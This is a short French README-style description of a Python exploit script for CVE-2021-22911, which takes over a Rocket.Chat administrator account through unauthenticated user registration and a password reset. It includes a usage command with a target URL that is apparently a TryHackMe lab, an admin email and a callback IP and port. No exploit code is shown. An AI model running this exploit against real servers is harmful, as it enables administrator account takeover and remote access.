
Script d'exploitation Python pour CVE-2021-22911 ciblant la réinitialisation du mot de passe administrateur de Rocket.Chat via l'enregistrement d'utilisateur non authentifié. Automatise l'exploitation avec cible configurable, nom d'utilisateur administrateur et IP de rappel.
Si vous avez déjà enregistré un utilisateur, cela ne réinitialisera que le mot de passe administrateur, et non les deux. Rendant l'exploitation bien plus rapide.
python3 exploit.py -u test -a [email protected] -t http://chat.rocket.thm -i 10.10.4.24 -p 80